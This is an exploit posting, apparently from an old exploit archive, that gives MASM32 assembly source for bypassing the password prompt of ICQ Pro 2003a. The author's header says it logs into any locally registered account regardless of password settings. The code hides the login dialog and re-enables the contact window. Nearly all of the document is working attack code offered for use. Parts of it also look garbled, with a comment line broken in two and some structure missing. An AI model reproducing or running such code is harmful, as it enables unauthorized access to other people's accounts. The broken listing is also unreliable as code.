ICQ Pro 2003a Password Bypass exploit (ca1-icq.asm)

     * Version TXT Disponible ici *
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
                              ;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF 
                              ; -------------------------------------------------------------------------
                              ;  07/02/2003 - ca1-icq.asm 
                              ;  ICQ Password Bypass exploit.
                              ;  written by Caua Moura Prado (aka ca1)
                              ;  This exploit allows you to login to ICQ server using any account registered *locally*
                              ;  no matter the 'save password' option is checked or not. High level security is also bypassed. 
                              ;  All you have to do is run the exploit and set status property using your mouse when the flower
                              ;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run 
                              ;  the exploit again. 
                              ;        uh-oh!
                              ;         ___     
                              ;      __/   \__  
                              ;     /  \___/  \        Vulnerable:
                              ;     \__/+ +\__/          ICQ Pro 2003a Build #3800
                              ;     /   ~~~   \
                              ;     \__/   \__/        Not Vulnerable:
                              ;        \___/                ICQ Lite alpha Build 1211
                              ;                               ICQ 2001b and ICQ 2002a 
                              ;    tHe Flaw Power       All other versions were not tested.                       
                              coded with masm32
                              ; ________________________________________________________________exploit born in .br

                              .model flat, stdcall
                              option casemap:none
                              include \masm32\include\user32.inc
                              include \masm32\include\kernel32.inc
                              includelib \masm32\lib\user32.lib
                              includelib \masm32\lib\kernel32.lib
                              szTextHigh byte 'Password Verification', 0 
                              szTextLow byte 'Login to server', 0
                              szClassName byte '#32770', 0
                              hWndLogin dword ?
                              invoke FindWindow, addr szClassName, addr szTextHigh
                              mov hWndLogin, eax  
                              .if hWndLogin == 0
                              invoke FindWindow, addr szClassName, addr szTextLow
                              mov hWndLogin, eax
                              invoke GetParent, hWndLogin 
                              invoke EnableWindow, eax, 1      ;Enable ICQ contact 
                              invoke ShowWindow, hWndLogin, 0  ;get rid of Login 
                              screen (don't kill this window)
                              invoke ExitProcess, 0            ;uhuu.. cya! i gotta 
                              end _entrypoint

                              ; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
                              ;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF 
                              ; -------------------------------------------------------------------------



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